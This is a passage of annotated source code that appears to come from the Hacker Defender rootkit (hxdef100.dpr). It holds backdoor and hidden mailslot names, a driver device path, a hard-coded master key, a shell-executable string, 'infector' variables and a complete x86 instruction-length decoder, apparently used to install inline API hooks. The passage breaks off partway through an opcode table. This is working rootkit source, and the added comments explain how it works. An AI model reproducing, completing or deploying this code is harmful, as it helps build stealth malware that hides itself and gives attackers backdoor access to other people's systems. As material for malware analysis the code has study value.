📄 hxdef100.dpr
@NtNotifyChangeDirectoryFileAddr : dd 000000000h
@NtWaitForSingleObjectAddr : dd 000000000h
@NtWaitForMultipleObjectsAddr : dd 000000000h
@NtDelayExecutionAddr : dd 000000000h
@NtQuerySystemTimeAddr : dd 000000000h
{$IFDEF LOGGING}
@NtWriteFileAddr : dd 000000000h
{$ENDIF}
@Data:
// Data embedded in the code stream and addressed by label from the routines
// that follow. Strings are NUL-terminated; the ones emitted as char,000h pairs
// are UTF-16LE (wide) strings with a double-NUL terminator.
@BaseNamedObjectsName : db '\BaseNamedObjects' ,000h
@Consts :
// Mailslot names used for local communication. Going by the label names, these
// are the server, client and backdoor endpoints respectively; the protocol
// spoken over them is not in view here.
@cServerMailslotName : db '\\.\mailslot\hxdef-rk100sABCDEFGH',000h
@cClientMailslotName : db '\\.\mailslot\hxdef-rkc000' ,000h
@cBackdoorMailslotName : db '\\.\mailslot\hxdef-rkb000' ,000h
// Wildcard pattern covering every hxdef* mailslot device name. The label
// suggests objects matching it are the ones hidden from enumeration — the
// matching code is outside this chunk.
@cMailslotsHiddenName : db '\Device\Mailslot\hxdef*' ,000h
// NT device names of the TCP and UDP transports.
@cDeviceTCP : db '\Device\Tcp' ,000h
@cDeviceUDP : db '\Device\Udp' ,000h
// UTF-16LE "\??\HxDefDriver" + wide NUL: NT object path of the driver.
@cDriverDeviceName : db '\',000h, '?',000h, '?',000h, '\',000h
db 'H',000h, 'x',000h, 'D',000h, 'e',000h
db 'f',000h, 'D',000h, 'r',000h, 'i',000h
db 'v',000h, 'e',000h, 'r',000h,000h,000h
// 32-byte constant. The label names it a master key; a key compiled into the
// image is recoverable by anyone holding the binary. How it is used (and
// whether the trailing 000h is part of the key or a terminator) is not visible
// in this chunk.
@cMasterKey : db 001h,09Ah,08Ch,066h,0AFh,0C0h,04Ah,011h
db 09Eh,03Fh,040h,088h,012h,02Ch,03Ah,04Ah
db 084h,065h,038h,0B0h,0B4h,008h,00Bh,0AFh
db 0DBh,0CEh,002h,094h,034h,05Fh,022h,000h
// UTF-16LE "COMSPEC" + wide NUL — presumably the environment variable that is
// resolved to find the command interpreter for the shell; confirm against caller.
@cShellExecutable : db 'C',000h, 'O',000h, 'M',000h, 'S',000h
db 'P',000h, 'E',000h, 'C',000h,000h,000h
// 13 bytes, 01h..0Dh. Purpose not visible in this chunk.
@IntercomBuffer : db 001h,002h,003h,004h,005h,006h,007h,008h
db 009h,00Ah,00Bh,00Ch,00Dh
// 6-byte constant 00 00 00 00 00 01. Meaning not visible in this chunk.
@cSWSA : db 000h,000h,000h,000h,000h,001h
@Locals :
{infector vars}
// Four byte-sized state flags (zero-initialised), 4 bytes in total.
@LGlobalCheck : db 00h
@LCriticalSectionFlag : db 00h
@LUnhookInProgress : db 00h
@LReserved1 : db 00h
// These two dwords must stay adjacent: together they form one 8-byte buffer.
@LHookRunning : dd 000000000h
@LNotifyTable : dd 000000000h
//-----------------------------------------------------------------------
// @GetInstructionLen -- table-driven IA-32 instruction length decoder.
//   In:       [esp+4] = pointer to the first byte of the instruction
//   Out:      eax = instruction length in bytes, or -1 (0FFFFFFFFh) when the
//             two-byte (0Fh xx) table marks the opcode invalid
//   Stack:    pops its single argument on return (ret 004h)
//   Clobbers: eax, ecx, edx, flags. ebx is pushed/popped around each table
//             lookup and therefore survives the call.
//   Reads the prefix/opcode bytes, the ModRM byte and the SIB byte from the
//   input with no bounds check and no cap on the number of prefixes (x86
//   allows at most 15 bytes per instruction); displacement and immediate
//   bytes are only counted, never read. The caller must guarantee the memory
//   is readable. Presumably used to size the bytes relocated when an inline
//   hook is installed — the caller is not in view.
//
// edx is the flag word. Low byte (dl): C_PREFIX, C_67, C_MEM67 and the
// displacement-size bits C_MEM1/C_MEM2/C_MEM4. High byte (dh): C_MODRM,
// C_DATAW0, C_DATA66, C_66 and the immediate-size bits C_DATA1/C_DATA2/C_DATA4.
// The exit path adds the masked dl and dh straight onto the consumed-byte
// count, so those constants (defined outside this view) must be encoded with
// the numeric value 1/2/4 within their respective byte.
//
// The lookup tables are located PC-relatively (call/pop) plus HARD-CODED byte
// distances: 0104h from @GetInstructionLen_nul_addr1 to
// @GetInstructionLen_table_1, and 049Ch from @GetInstructionLen_nul_addr2 to
// the 0Fh table. Inserting, removing or re-encoding a single instruction
// between those labels and the tables, or resizing a table, silently breaks
// the lookups (wrong lengths, no error). Re-derive both constants after any
// edit to this routine.
//-----------------------------------------------------------------------
@GetInstructionLen:
mov ecx,[esp+004h] //ECX = opcode ptr
xor edx,edx //flags
xor eax,eax //upper 24 bits of eax stay 0 so al can index the dword tables
@GetInstructionLen_prefix:
and dl,not C_PREFIX //clear the previous byte's prefix bit so the test below reflects only this byte
mov al,[ecx]
inc ecx
push ebx
call @GetInstructionLen_nul_addr1 //pushes the address of the next label
@GetInstructionLen_nul_addr1:
pop ebx //ebx = address of @GetInstructionLen_nul_addr1
add ebx,0104h //ebx = @GetInstructionLen_table_1 (hard-coded distance, see header)
or edx,[ebx+eax*004h] //merge this opcode's flags into the flag word
pop ebx
test dl, C_PREFIX
jnz @GetInstructionLen_prefix //legacy prefix consumed: decode the following byte
cmp al,0F6h
je @GetInstructionLen_test
cmp al,0F7h
je @GetInstructionLen_test //F6h/F7h group: immediate only for the TEST form
cmp al,0CDh
je @GetInstructionLen_int //INT imm8, with CD 20h special-cased
cmp al,0Fh
je @GetInstructionLen_0F //two-byte opcode escape
@GetInstructionLen_cont:
test dh,C_DATAW0 shr 8
jnz @GetInstructionLen_dataw0 //immediate width is selected by opcode bit 0
@GetInstructionLen_dataw0done:
test dh,C_MODRM shr 8
jnz @GetInstructionLen_modrm
@GetInstructionLen_exitmodrm:
test dl,C_MEM67
jnz @GetInstructionLen_mem67 //direct-address operand: width follows the 67h prefix
@GetInstructionLen_mem67done:
test dh,C_DATA66 shr 8
jnz @GetInstructionLen_data66 //16/32-bit immediate: width follows the 66h prefix
@GetInstructionLen_data66done:
mov eax,ecx
sub eax,[esp+4] //eax = bytes consumed so far (prefixes, opcode(s), ModRM, SIB)
and edx,C_MEM1+C_MEM2+C_MEM4 + C_DATA1+C_DATA2+C_DATA4 //keep only the size bits
add al,dl //+ displacement size (requires C_MEMn == n)
add al,dh //+ immediate size (requires C_DATAn == n shl 8)
@GetInstructionLen_exit:
ret 004h
@GetInstructionLen_test:
or dh,C_MODRM shr 8
test byte ptr [ecx],00111000b // F6/F7 -- test: ModRM reg field (bits 5:3) == 000 is TEST r/m,imm
jnz @GetInstructionLen_cont
or dh,C_DATAW0 shr 8 //TEST carries an immediate: imm8 for F6h, imm16/32 for F7h
jmp @GetInstructionLen_cont
@GetInstructionLen_int:
or dh,C_DATA1 shr 8 //INT imm8: 2 bytes
cmp byte ptr [ecx],20h
jne @GetInstructionLen_cont
or dh,C_DATA4 shr 8 //CD 20h: four more bytes counted, 6 in total (presumably the Win9x VxD-call form)
jmp @GetInstructionLen_cont
@GetInstructionLen_0F:
mov al,[ecx] //second opcode byte indexes the 0Fh table
inc ecx
push ebx
call @GetInstructionLen_nul_addr2
@GetInstructionLen_nul_addr2:
pop ebx //ebx = address of @GetInstructionLen_nul_addr2
add ebx,049Ch //ebx = 0Fh table (hard-coded distance, see header)
or edx,[ebx+eax*004h]
pop ebx
cmp edx,-1 //an all-ones entry marks an invalid/unsupported 0Fh opcode
jne @GetInstructionLen_cont
@GetInstructionLen_error:
mov eax,edx //return -1
jmp @GetInstructionLen_exit
@GetInstructionLen_dataw0:
xor dh,C_DATA66 shr 8 //provisionally a 16/32-bit immediate
test al,00000001b
jnz @GetInstructionLen_dataw0done //opcode bit 0 set: keep C_DATA66
xor dh,(C_DATA66+C_DATA1) shr 8 //bit 0 clear: byte operand -> imm8 instead
jmp @GetInstructionLen_dataw0done
@GetInstructionLen_mem67:
xor dl,C_MEM2 //provisionally a 16-bit address
test dl,C_67
jnz @GetInstructionLen_mem67done //67h present: keep 2 bytes
xor dl,C_MEM4+C_MEM2 //no 67h: 32-bit address
jmp @GetInstructionLen_mem67done
@GetInstructionLen_data66:
xor dh,C_DATA2 shr 8 //provisionally imm16
test dh,C_66 shr 8
jnz @GetInstructionLen_data66done //66h present: keep imm16
xor dh,(C_DATA4+C_DATA2) shr 8 //no 66h: imm32
jmp @GetInstructionLen_data66done
@GetInstructionLen_modrm:
mov al,[ecx]
inc ecx
mov ah,al // ah=mod, al=rm
and ax,0C007h //ah = mod (bits 7:6), al = rm (bits 2:0)
cmp ah,0C0h
je @GetInstructionLen_exitmodrm //mod=11: register operand, no displacement
test dl,C_67
jnz @GetInstructionLen_modrm16 //67h present: 16-bit addressing forms
@GetInstructionLen_modrm32:
cmp al,04h
jne @GetInstructionLen_a
mov al,[ecx] // sib
inc ecx
and al,07h //al = SIB base field
@GetInstructionLen_a:
cmp ah,40h
je @GetInstructionLen_mem1 //mod=01: disp8
cmp ah,80h
je @GetInstructionLen_mem4 //mod=10: disp32
cmp ax,0005h
jne @GetInstructionLen_exitmodrm //mod=00, rm/base=101: disp32; any other mod=00 form has none
@GetInstructionLen_mem4:
or dl,C_MEM4
jmp @GetInstructionLen_exitmodrm
@GetInstructionLen_mem1:
or dl,C_MEM1
jmp @GetInstructionLen_exitmodrm
@GetInstructionLen_modrm16:
cmp ax,0006h
je @GetInstructionLen_mem2 //mod=00, rm=110: disp16
cmp ah,40h
je @GetInstructionLen_mem1 //mod=01: disp8
cmp ah,80h
jne @GetInstructionLen_exitmodrm //other mod=00 forms: no displacement
@GetInstructionLen_mem2:
or dl,C_MEM2 //mod=10: disp16
jmp @GetInstructionLen_exitmodrm
// .data
//0Fh     -- handled in code (@GetInstructionLen_0F): its table_1 entry carries no flags (i.e. flags must be 0)
//F6h,F7h -- likewise: ModRM always; an immediate only when the ModRM reg field ttt=000 (TEST) -- imm8 for F6h, imm16/32 for F7h
//CDh     -- likewise: 2 bytes, except CD 20h which is counted as 6 bytes
@GetInstructionLen_table_1: //label dword // normal instructions
dd C_MODRM //00
dd C_MODRM //01
dd C_MODRM //02
dd C_MODRM //03
dd C_DATAW0 //04
dd C_DATAW0 //05
dd 0 //06
dd 0 //07
dd C_MODRM //08
dd C_MODRM //09
dd C_MODRM //0A
dd C_MODRM //0B
dd C_DATAW0 //0C
dd C_DATAW0 //0D
dd 0 //0E
dd 0 //0F
dd C_MODRM //10
dd C_MODRM //11
dd C_MODRM //12
dd C_MODRM //13
dd C_DATAW0 //14
dd C_DATAW0 //15
dd 0 //16
dd 0 //17
dd C_MODRM //18
dd C_MODRM //19
dd C_MODRM //1A
dd C_MODRM //1B
dd C_DATAW0 //1C
dd C_DATAW0 //1D
dd 0 //1E
dd 0 //1F
dd C_MODRM //20
dd C_MODRM //21
dd C_MODRM //22
dd C_MODRM //23
dd C_DATAW0 //24
dd C_DATAW0 //25
dd C_PREFIX //26
dd 0 //27
dd C_MODRM //28
dd C_MODRM //29
dd C_MODRM //2A
dd C_MODRM //2B
dd C_DATAW0 //2C
dd C_DATAW0 //2D
dd C_PREFIX //2E
dd 0 //2F
dd C_MODRM //30
dd C_MODRM //31
dd C_MODRM //32
dd C_MODRM //33
dd C_DATAW0 //34
dd C_DATAW0 //35
dd C_PREFIX //36
dd 0 //37
dd C_MODRM //38
dd C_MODRM //39
dd C_MODRM //3A
dd C_MODRM //3B
dd C_DATAW0 //3C
dd C_DATAW0 //3D
dd C_PRE